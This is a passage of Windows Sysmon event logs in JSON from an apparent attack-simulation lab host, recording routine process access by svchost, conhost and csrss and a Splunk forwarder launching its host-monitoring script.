{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-001032F30300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-001032F30300}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.582\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-0010C4F80300}\r\nProcessId: 3924\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.582","ProcessGuid":"{A837DB8D-01CA-5F25-0000-0010C4F80300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010C4F80300}\r\nTargetProcessId: 3924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010C4F80300}","TargetProcessId":"3924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010C4F80300}\r\nTargetProcessId: 3924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010C4F80300}","TargetProcessId":"3924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 